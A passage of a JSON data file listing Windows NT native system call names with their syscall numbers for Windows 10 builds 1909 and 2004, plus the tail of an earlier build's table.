"NtCreateSymbolicLinkObject": 188, "NtCreateThreadEx": 189, "NtCreateTimer": 190, "NtCreateTimer2": 191, "NtCreateToken": 192, "NtCreateTokenEx": 193, "NtCreateTransaction": 194, "NtCreateTransactionManager": 195, "NtCreateUserProcess": 196, "NtCreateWaitCompletionPacket": 197, "NtCreateWaitablePort": 198, "NtCreateWnfStateName": 199, "NtCreateWorkerFactory": 200, "NtDebugActiveProcess": 201, "NtDebugContinue": 202, "NtDeleteAtom": 203, "NtDeleteBootEntry": 204, "NtDeleteDriverEntry": 205, "NtDeleteFile": 206, "NtDeleteKey": 207, "NtDeleteObjectAuditAlarm": 208, "NtDeletePrivateNamespace": 209, "NtDeleteValueKey": 210, "NtDeleteWnfStateData": 211, "NtDeleteWnfStateName": 212, "NtDisableLastKnownGood": 213, "NtDisplayString": 214, "NtDrawText": 215, "NtEnableLastKnownGood": 216, "NtEnumerateBootEntries": 217, "NtEnumerateDriverEntries": 218, "NtEnumerateSystemEnvironmentValuesEx": 219, "NtEnumerateTransactionObject": 220, "NtExtendSection": 221, "NtFilterBootOption": 222, "NtFilterToken": 223, "NtFilterTokenEx": 224, "NtFlushBuffersFileEx": 225, "NtFlushInstallUILanguage": 226, "NtFlushInstructionCache": 227, "NtFlushKey": 228, "NtFlushProcessWriteBuffers": 229, "NtFlushVirtualMemory": 230, "NtFlushWriteBuffer": 231, "NtFreeUserPhysicalPages": 232, "NtFreezeRegistry": 233, "NtFreezeTransactions": 234, "NtGetCachedSigningLevel": 235, "NtGetCompleteWnfStateSubscription": 236, "NtGetContextThread": 237, "NtGetCurrentProcessorNumber": 238, "NtGetCurrentProcessorNumberEx": 239, "NtGetDevicePowerState": 240, "NtGetMUIRegistryInfo": 241, "NtGetNextProcess": 242, "NtGetNextThread": 243, "NtGetNlsSectionPtr": 244, "NtGetNotificationResourceManager": 245, "NtGetWriteWatch": 246, "NtImpersonateAnonymousToken": 247, "NtImpersonateThread": 248, "NtInitializeEnclave": 249, "NtInitializeNlsFiles": 250, "NtInitializeRegistry": 251, "NtInitiatePowerAction": 252, "NtIsSystemResumeAutomatic": 253, "NtIsUILanguageComitted": 254, "NtListenPort": 255, "NtLoadDriver": 256, "NtLoadEnclaveData": 257, "NtLoadKey": 258, "NtLoadKey2": 259, "NtLoadKeyEx": 260, "NtLockFile": 261, "NtLockProductActivationKeys": 262, "NtLockRegistryKey": 263, "NtLockVirtualMemory": 264, "NtMakePermanentObject": 265, "NtMakeTemporaryObject": 266, "NtManageHotPatch": 267, "NtManagePartition": 268, "NtMapCMFModule": 269, "NtMapUserPhysicalPages": 270, "NtMapViewOfSectionEx": 271, "NtModifyBootEntry": 272, "NtModifyDriverEntry": 273, "NtNotifyChangeDirectoryFile": 274, "NtNotifyChangeDirectoryFileEx": 275, "NtNotifyChangeKey": 276, "NtNotifyChangeMultipleKeys": 277, "NtNotifyChangeSession": 278, "NtOpenEnlistment": 279, "NtOpenEventPair": 280, "NtOpenIoCompletion": 281, "NtOpenJobObject": 282, "NtOpenKeyEx": 283, "NtOpenKeyTransacted": 284, "NtOpenKeyTransactedEx": 285, "NtOpenKeyedEvent": 286, "NtOpenMutant": 287, "NtOpenObjectAuditAlarm": 288, "NtOpenPartition": 289, "NtOpenPrivateNamespace": 290, "NtOpenProcessToken": 291, "NtOpenRegistryTransaction": 292, "NtOpenResourceManager": 293, "NtOpenSemaphore": 294, "NtOpenSession": 295, "NtOpenSymbolicLinkObject": 296, "NtOpenThread": 297, "NtOpenTimer": 298, "NtOpenTransaction": 299, "NtOpenTransactionManager": 300, "NtPlugPlayControl": 301, "NtPrePrepareComplete": 302, "NtPrePrepareEnlistment": 303, "NtPrepareComplete": 304, "NtPrepareEnlistment": 305, "NtPrivilegeCheck": 306, "NtPrivilegeObjectAuditAlarm": 307, "NtPrivilegedServiceAuditAlarm": 308, "NtPropagationComplete": 309, "NtPropagationFailed": 310, "NtPulseEvent": 311, "NtQueryAuxiliaryCounterFrequency": 312, "NtQueryBootEntryOrder": 313, "NtQueryBootOptions": 314, "NtQueryDebugFilterState": 315, "NtQueryDirectoryFileEx": 316, "NtQueryDirectoryObject": 317, "NtQueryDriverEntryOrder": 318, "NtQueryEaFile": 319, "NtQueryFullAttributesFile": 320, "NtQueryInformationAtom": 321, "NtQueryInformationByName": 322, "NtQueryInformationEnlistment": 323, "NtQueryInformationJobObject": 324, "NtQueryInformationPort": 325, "NtQueryInformationResourceManager": 326, "NtQueryInformationTransaction": 327, "NtQueryInformationTransactionManager": 328, "NtQueryInformationWorkerFactory": 329, "NtQueryInstallUILanguage": 330, "NtQueryIntervalProfile": 331, "NtQueryIoCompletion": 332, "NtQueryLicenseValue": 333, "NtQueryMultipleValueKey": 334, "NtQueryMutant": 335, "NtQueryOpenSubKeys": 336, "NtQueryOpenSubKeysEx": 337, "NtQueryPortInformationProcess": 338, "NtQueryQuotaInformationFile": 339, "NtQuerySecurityAttributesToken": 340, "NtQuerySecurityObject": 341, "NtQuerySecurityPolicy": 342, "NtQuerySemaphore": 343, "NtQuerySymbolicLinkObject": 344, "NtQuerySystemEnvironmentValue": 345, "NtQuerySystemEnvironmentValueEx": 346, "NtQuerySystemInformationEx": 347, "NtQueryTimerResolution": 348, "NtQueryWnfStateData": 349, "NtQueryWnfStateNameInformation": 350, "NtQueueApcThreadEx": 351, "NtRaiseException": 352, "NtRaiseHardError": 353, "NtReadOnlyEnlistment": 354, "NtRecoverEnlistment": 355, "NtRecoverResourceManager": 356, "NtRecoverTransactionManager": 357, "NtRegisterProtocolAddressInformation": 358, "NtRegisterThreadTerminatePort": 359, "NtReleaseKeyedEvent": 360, "NtReleaseWorkerFactoryWorker": 361, "NtRemoveIoCompletionEx": 362, "NtRemoveProcessDebug": 363, "NtRenameKey": 364, "NtRenameTransactionManager": 365, "NtReplaceKey": 366, "NtReplacePartitionUnit": 367, "NtReplyWaitReplyPort": 368, "NtRequestPort": 369, "NtResetEvent": 370, "NtResetWriteWatch": 371, "NtRestoreKey": 372, "NtResumeProcess": 373, "NtRevertContainerImpersonation": 374, "NtRollbackComplete": 375, "NtRollbackEnlistment": 376, "NtRollbackRegistryTransaction": 377, "NtRollbackTransaction": 378, "NtRollforwardTransactionManager": 379, "NtSaveKey": 380, "NtSaveKeyEx": 381, "NtSaveMergedKeys": 382, "NtSecureConnectPort": 383, "NtSerializeBoot": 384, "NtSetBootEntryOrder": 385, "NtSetBootOptions": 386, "NtSetCachedSigningLevel": 387, "NtSetCachedSigningLevel2": 388, "NtSetContextThread": 389, "NtSetDebugFilterState": 390, "NtSetDefaultHardErrorPort": 391, "NtSetDefaultLocale": 392, "NtSetDefaultUILanguage": 393, "NtSetDriverEntryOrder": 394, "NtSetEaFile": 395, "NtSetHighEventPair": 396, "NtSetHighWaitLowEventPair": 397, "NtSetIRTimer": 398, "NtSetInformationDebugObject": 399, "NtSetInformationEnlistment": 400, "NtSetInformationJobObject": 401, "NtSetInformationKey": 402, "NtSetInformationResourceManager": 403, "NtSetInformationSymbolicLink": 404, "NtSetInformationToken": 405, "NtSetInformationTransaction": 406, "NtSetInformationTransactionManager": 407, "NtSetInformationVirtualMemory": 408, "NtSetInformationWorkerFactory": 409, "NtSetIntervalProfile": 410, "NtSetIoCompletion": 411, "NtSetIoCompletionEx": 412, "NtSetLdtEntries": 413, "NtSetLowEventPair": 414, "NtSetLowWaitHighEventPair": 415, "NtSetQuotaInformationFile": 416, "NtSetSecurityObject": 417, "NtSetSystemEnvironmentValue": 418, "NtSetSystemEnvironmentValueEx": 419, "NtSetSystemInformation": 420, "NtSetSystemPowerState": 421, "NtSetSystemTime": 422, "NtSetThreadExecutionState": 423, "NtSetTimer2": 424, "NtSetTimerEx": 425, "NtSetTimerResolution": 426, "NtSetUuidSeed": 427, "NtSetVolumeInformationFile": 428, "NtSetWnfProcessNotificationEvent": 429, "NtShutdownSystem": 430, "NtShutdownWorkerFactory": 431, "NtSignalAndWaitForSingleObject": 432, "NtSinglePhaseReject": 433, "NtStartProfile": 434, "NtStopProfile": 435, "NtSubscribeWnfStateChange": 436, "NtSuspendProcess": 437, "NtSuspendThread": 438, "NtSystemDebugControl": 439, "NtTerminateEnclave": 440, "NtTerminateJobObject": 441, "NtTestAlert": 442, "NtThawRegistry": 443, "NtThawTransactions": 444, "NtTraceControl": 445, "NtTranslateFilePath": 446, "NtUmsThreadYield": 447, "NtUnloadDriver": 448, "NtUnloadKey": 449, "NtUnloadKey2": 450, "NtUnloadKeyEx": 451, "NtUnlockFile": 452, "NtUnlockVirtualMemory": 453, "NtUnmapViewOfSectionEx": 454, "NtUnsubscribeWnfStateChange": 455, "NtUpdateWnfStateData": 456, "NtVdmControl": 457, "NtWaitForAlertByThreadId": 458, "NtWaitForDebugEvent": 459, "NtWaitForKeyedEvent": 460, "NtWaitForWorkViaWorkerFactory": 461, "NtWaitHighEventPair": 462, "NtWaitLowEventPair": 463}, "1909": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireProcessActivityReference": 103, "NtAddAtomEx": 104, "NtAddBootEntry": 105, "NtAddDriverEntry": 106, "NtAdjustGroupsToken": 107, "NtAdjustTokenClaimsAndDeviceGroups": 108, "NtAlertResumeThread": 109, "NtAlertThread": 110, "NtAlertThreadByThreadId": 111, "NtAllocateLocallyUniqueId": 112, "NtAllocateReserveObject": 113, "NtAllocateUserPhysicalPages": 114, "NtAllocateUuids": 115, "NtAllocateVirtualMemoryEx": 116, "NtAlpcAcceptConnectPort": 117, "NtAlpcCancelMessage": 118, "NtAlpcConnectPort": 119, "NtAlpcConnectPortEx": 120, "NtAlpcCreatePort": 121, "NtAlpcCreatePortSection": 122, "NtAlpcCreateResourceReserve": 123, "NtAlpcCreateSectionView": 124, "NtAlpcCreateSecurityContext": 125, "NtAlpcDeletePortSection": 126, "NtAlpcDeleteResourceReserve": 127, "NtAlpcDeleteSectionView": 128, "NtAlpcDeleteSecurityContext": 129, "NtAlpcDisconnectPort": 130, "NtAlpcImpersonateClientContainerOfPort": 131, "NtAlpcImpersonateClientOfPort": 132, "NtAlpcOpenSenderProcess": 133, "NtAlpcOpenSenderThread": 134, "NtAlpcQueryInformation": 135, "NtAlpcQueryInformationMessage": 136, "NtAlpcRevokeSecurityContext": 137, "NtAlpcSendWaitReceivePort": 138, "NtAlpcSetInformation": 139, "NtAreMappedFilesTheSame": 140, "NtAssignProcessToJobObject": 141, "NtAssociateWaitCompletionPacket": 142, "NtCallEnclave": 143, "NtCancelIoFileEx": 144, "NtCancelSynchronousIoFile": 145, "NtCancelTimer2": 146, "NtCancelWaitCompletionPacket": 147, "NtCommitComplete": 148, "NtCommitEnlistment": 149, "NtCommitRegistryTransaction": 150, "NtCommitTransaction": 151, "NtCompactKeys": 152, "NtCompareObjects": 153, "NtCompareSigningLevels": 154, "NtCompareTokens": 155, "NtCompleteConnectPort": 156, "NtCompressKey": 157, "NtConnectPort": 158, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 159, "NtCreateCrossVmEvent": 160, "NtCreateDebugObject": 161, "NtCreateDirectoryObject": 162, "NtCreateDirectoryObjectEx": 163, "NtCreateEnclave": 164, "NtCreateEnlistment": 165, "NtCreateEventPair": 166, "NtCreateIRTimer": 167, "NtCreateIoCompletion": 168, "NtCreateJobObject": 169, "NtCreateJobSet": 170, "NtCreateKeyTransacted": 171, "NtCreateKeyedEvent": 172, "NtCreateLowBoxToken": 173, "NtCreateMailslotFile": 174, "NtCreateMutant": 175, "NtCreateNamedPipeFile": 176, "NtCreatePagingFile": 177, "NtCreatePartition": 178, "NtCreatePort": 179, "NtCreatePrivateNamespace": 180, "NtCreateProcess": 181, "NtCreateProfile": 182, "NtCreateProfileEx": 183, "NtCreateRegistryTransaction": 184, "NtCreateResourceManager": 185, "NtCreateSectionEx": 186, "NtCreateSemaphore": 187, "NtCreateSymbolicLinkObject": 188, "NtCreateThreadEx": 189, "NtCreateTimer": 190, "NtCreateTimer2": 191, "NtCreateToken": 192, "NtCreateTokenEx": 193, "NtCreateTransaction": 194, "NtCreateTransactionManager": 195, "NtCreateUserProcess": 196, "NtCreateWaitCompletionPacket": 197, "NtCreateWaitablePort": 198, "NtCreateWnfStateName": 199, "NtCreateWorkerFactory": 200, "NtDebugActiveProcess": 201, "NtDebugContinue": 202, "NtDeleteAtom": 203, "NtDeleteBootEntry": 204, "NtDeleteDriverEntry": 205, "NtDeleteFile": 206, "NtDeleteKey": 207, "NtDeleteObjectAuditAlarm": 208, "NtDeletePrivateNamespace": 209, "NtDeleteValueKey": 210, "NtDeleteWnfStateData": 211, "NtDeleteWnfStateName": 212, "NtDisableLastKnownGood": 213, "NtDisplayString": 214, "NtDrawText": 215, "NtEnableLastKnownGood": 216, "NtEnumerateBootEntries": 217, "NtEnumerateDriverEntries": 218, "NtEnumerateSystemEnvironmentValuesEx": 219, "NtEnumerateTransactionObject": 220, "NtExtendSection": 221, "NtFilterBootOption": 222, "NtFilterToken": 223, "NtFilterTokenEx": 224, "NtFlushBuffersFileEx": 225, "NtFlushInstallUILanguage": 226, "NtFlushInstructionCache": 227, "NtFlushKey": 228, "NtFlushProcessWriteBuffers": 229, "NtFlushVirtualMemory": 230, "NtFlushWriteBuffer": 231, "NtFreeUserPhysicalPages": 232, "NtFreezeRegistry": 233, "NtFreezeTransactions": 234, "NtGetCachedSigningLevel": 235, "NtGetCompleteWnfStateSubscription": 236, "NtGetContextThread": 237, "NtGetCurrentProcessorNumber": 238, "NtGetCurrentProcessorNumberEx": 239, "NtGetDevicePowerState": 240, "NtGetMUIRegistryInfo": 241, "NtGetNextProcess": 242, "NtGetNextThread": 243, "NtGetNlsSectionPtr": 244, "NtGetNotificationResourceManager": 245, "NtGetWriteWatch": 246, "NtImpersonateAnonymousToken": 247, "NtImpersonateThread": 248, "NtInitializeEnclave": 249, "NtInitializeNlsFiles": 250, "NtInitializeRegistry": 251, "NtInitiatePowerAction": 252, "NtIsSystemResumeAutomatic": 253, "NtIsUILanguageComitted": 254, "NtListenPort": 255, "NtLoadDriver": 256, "NtLoadEnclaveData": 257, "NtLoadKey": 258, "NtLoadKey2": 259, "NtLoadKeyEx": 260, "NtLockFile": 261, "NtLockProductActivationKeys": 262, "NtLockRegistryKey": 263, "NtLockVirtualMemory": 264, "NtMakePermanentObject": 265, "NtMakeTemporaryObject": 266, "NtManageHotPatch": 267, "NtManagePartition": 268, "NtMapCMFModule": 269, "NtMapUserPhysicalPages": 270, "NtMapViewOfSectionEx": 271, "NtModifyBootEntry": 272, "NtModifyDriverEntry": 273, "NtNotifyChangeDirectoryFile": 274, "NtNotifyChangeDirectoryFileEx": 275, "NtNotifyChangeKey": 276, "NtNotifyChangeMultipleKeys": 277, "NtNotifyChangeSession": 278, "NtOpenEnlistment": 279, "NtOpenEventPair": 280, "NtOpenIoCompletion": 281, "NtOpenJobObject": 282, "NtOpenKeyEx": 283, "NtOpenKeyTransacted": 284, "NtOpenKeyTransactedEx": 285, "NtOpenKeyedEvent": 286, "NtOpenMutant": 287, "NtOpenObjectAuditAlarm": 288, "NtOpenPartition": 289, "NtOpenPrivateNamespace": 290, "NtOpenProcessToken": 291, "NtOpenRegistryTransaction": 292, "NtOpenResourceManager": 293, "NtOpenSemaphore": 294, "NtOpenSession": 295, "NtOpenSymbolicLinkObject": 296, "NtOpenThread": 297, "NtOpenTimer": 298, "NtOpenTransaction": 299, "NtOpenTransactionManager": 300, "NtPlugPlayControl": 301, "NtPrePrepareComplete": 302, "NtPrePrepareEnlistment": 303, "NtPrepareComplete": 304, "NtPrepareEnlistment": 305, "NtPrivilegeCheck": 306, "NtPrivilegeObjectAuditAlarm": 307, "NtPrivilegedServiceAuditAlarm": 308, "NtPropagationComplete": 309, "NtPropagationFailed": 310, "NtPulseEvent": 311, "NtQueryAuxiliaryCounterFrequency": 312, "NtQueryBootEntryOrder": 313, "NtQueryBootOptions": 314, "NtQueryDebugFilterState": 315, "NtQueryDirectoryFileEx": 316, "NtQueryDirectoryObject": 317, "NtQueryDriverEntryOrder": 318, "NtQueryEaFile": 319, "NtQueryFullAttributesFile": 320, "NtQueryInformationAtom": 321, "NtQueryInformationByName": 322, "NtQueryInformationEnlistment": 323, "NtQueryInformationJobObject": 324, "NtQueryInformationPort": 325, "NtQueryInformationResourceManager": 326, "NtQueryInformationTransaction": 327, "NtQueryInformationTransactionManager": 328, "NtQueryInformationWorkerFactory": 329, "NtQueryInstallUILanguage": 330, "NtQueryIntervalProfile": 331, "NtQueryIoCompletion": 332, "NtQueryLicenseValue": 333, "NtQueryMultipleValueKey": 334, "NtQueryMutant": 335, "NtQueryOpenSubKeys": 336, "NtQueryOpenSubKeysEx": 337, "NtQueryPortInformationProcess": 338, "NtQueryQuotaInformationFile": 339, "NtQuerySecurityAttributesToken": 340, "NtQuerySecurityObject": 341, "NtQuerySecurityPolicy": 342, "NtQuerySemaphore": 343, "NtQuerySymbolicLinkObject": 344, "NtQuerySystemEnvironmentValue": 345, "NtQuerySystemEnvironmentValueEx": 346, "NtQuerySystemInformationEx": 347, "NtQueryTimerResolution": 348, "NtQueryWnfStateData": 349, "NtQueryWnfStateNameInformation": 350, "NtQueueApcThreadEx": 351, "NtRaiseException": 352, "NtRaiseHardError": 353, "NtReadOnlyEnlistment": 354, "NtRecoverEnlistment": 355, "NtRecoverResourceManager": 356, "NtRecoverTransactionManager": 357, "NtRegisterProtocolAddressInformation": 358, "NtRegisterThreadTerminatePort": 359, "NtReleaseKeyedEvent": 360, "NtReleaseWorkerFactoryWorker": 361, "NtRemoveIoCompletionEx": 362, "NtRemoveProcessDebug": 363, "NtRenameKey": 364, "NtRenameTransactionManager": 365, "NtReplaceKey": 366, "NtReplacePartitionUnit": 367, "NtReplyWaitReplyPort": 368, "NtRequestPort": 369, "NtResetEvent": 370, "NtResetWriteWatch": 371, "NtRestoreKey": 372, "NtResumeProcess": 373, "NtRevertContainerImpersonation": 374, "NtRollbackComplete": 375, "NtRollbackEnlistment": 376, "NtRollbackRegistryTransaction": 377, "NtRollbackTransaction": 378, "NtRollforwardTransactionManager": 379, "NtSaveKey": 380, "NtSaveKeyEx": 381, "NtSaveMergedKeys": 382, "NtSecureConnectPort": 383, "NtSerializeBoot": 384, "NtSetBootEntryOrder": 385, "NtSetBootOptions": 386, "NtSetCachedSigningLevel": 387, "NtSetCachedSigningLevel2": 388, "NtSetContextThread": 389, "NtSetDebugFilterState": 390, "NtSetDefaultHardErrorPort": 391, "NtSetDefaultLocale": 392, "NtSetDefaultUILanguage": 393, "NtSetDriverEntryOrder": 394, "NtSetEaFile": 395, "NtSetHighEventPair": 396, "NtSetHighWaitLowEventPair": 397, "NtSetIRTimer": 398, "NtSetInformationDebugObject": 399, "NtSetInformationEnlistment": 400, "NtSetInformationJobObject": 401, "NtSetInformationKey": 402, "NtSetInformationResourceManager": 403, "NtSetInformationSymbolicLink": 404, "NtSetInformationToken": 405, "NtSetInformationTransaction": 406, "NtSetInformationTransactionManager": 407, "NtSetInformationVirtualMemory": 408, "NtSetInformationWorkerFactory": 409, "NtSetIntervalProfile": 410, "NtSetIoCompletion": 411, "NtSetIoCompletionEx": 412, "NtSetLdtEntries": 413, "NtSetLowEventPair": 414, "NtSetLowWaitHighEventPair": 415, "NtSetQuotaInformationFile": 416, "NtSetSecurityObject": 417, "NtSetSystemEnvironmentValue": 418, "NtSetSystemEnvironmentValueEx": 419, "NtSetSystemInformation": 420, "NtSetSystemPowerState": 421, "NtSetSystemTime": 422, "NtSetThreadExecutionState": 423, "NtSetTimer2": 424, "NtSetTimerEx": 425, "NtSetTimerResolution": 426, "NtSetUuidSeed": 427, "NtSetVolumeInformationFile": 428, "NtSetWnfProcessNotificationEvent": 429, "NtShutdownSystem": 430, "NtShutdownWorkerFactory": 431, "NtSignalAndWaitForSingleObject": 432, "NtSinglePhaseReject": 433, "NtStartProfile": 434, "NtStopProfile": 435, "NtSubscribeWnfStateChange": 436, "NtSuspendProcess": 437, "NtSuspendThread": 438, "NtSystemDebugControl": 439, "NtTerminateEnclave": 440, "NtTerminateJobObject": 441, "NtTestAlert": 442, "NtThawRegistry": 443, "NtThawTransactions": 444, "NtTraceControl": 445, "NtTranslateFilePath": 446, "NtUmsThreadYield": 447, "NtUnloadDriver": 448, "NtUnloadKey": 449, "NtUnloadKey2": 450, "NtUnloadKeyEx": 451, "NtUnlockFile": 452, "NtUnlockVirtualMemory": 453, "NtUnmapViewOfSectionEx": 454, "NtUnsubscribeWnfStateChange": 455, "NtUpdateWnfStateData": 456, "NtVdmControl": 457, "NtWaitForAlertByThreadId": 458, "NtWaitForDebugEvent": 459, "NtWaitForKeyedEvent": 460, "NtWaitForWorkViaWorkerFactory": 461, "NtWaitHighEventPair": 462, "NtWaitLowEventPair": 463}, "2004": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireCrossVmMutant": 103, "NtAcquireProcessActivityReference": 104, "NtAddAtomEx": 105, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustGroupsToken": 108, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertResumeThread": 110, "NtAlertThread": 111, "NtAlertThreadByThreadId": 112, "NtAllocateLocallyUniqueId": 113, "NtAllocateReserveObject": 114, "NtAllocateUserPhysicalPages": 115, "NtAllocateUserPhysicalPagesEx": 116, "NtAllocateUuids": 117, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcConnectPort": 121, "NtAlpcConnectPortEx": 122, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtAreMappedFilesTheSame": 142, "NtAssignProcessToJobObject": 143, "NtAssociateWaitCompletionPacket": 144, "NtCallEnclave": 145, "NtCancelIoFileEx": 146, "NtCancelSynchronousIoFile": 147, "NtCancelTimer2": 148, "NtCancelWaitCompletionPacket": 149, "NtCommitComplete": 150, "NtCommitEnlistment": 151, "NtCommitRegistryTransaction": 152, "NtCommitTransaction": 153, "NtCompactKeys": 154, "NtCompareObjects": 155, "NtCompareSigningLevels": 156, "NtCompareTokens": 157, "NtCompleteConnectPort": 158, "NtCompressKey": 159, "NtConnectPort": 160, "NtContinueEx": 161, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 162, "NtCreateCrossVmEvent": 163, "NtCreateCrossVmMutant": 164, "NtCreateDebugObject": 165, "NtCreateDirectoryObject": 166, "NtCreateDirectoryObjectEx": 167, "NtCreateEnclave": 168, "NtCreateEnlistment": 169, "NtCreateEventPair": 170, "NtCreateIRTimer": 171, "NtCreateIoCompletion": 172, "NtCreateJobObject": 173, "NtCreateJobSet": 174, "NtCreateKeyTransacted": 175, "NtCreateKeyedEvent": 176, "NtCreateLowBoxToken": 177, "NtCreateMailslotFile": 178, "NtCreateMutant": 179, "NtCreateNamedPipeFile": 180, "NtCreatePagingFile": 181, "NtCreatePartition": 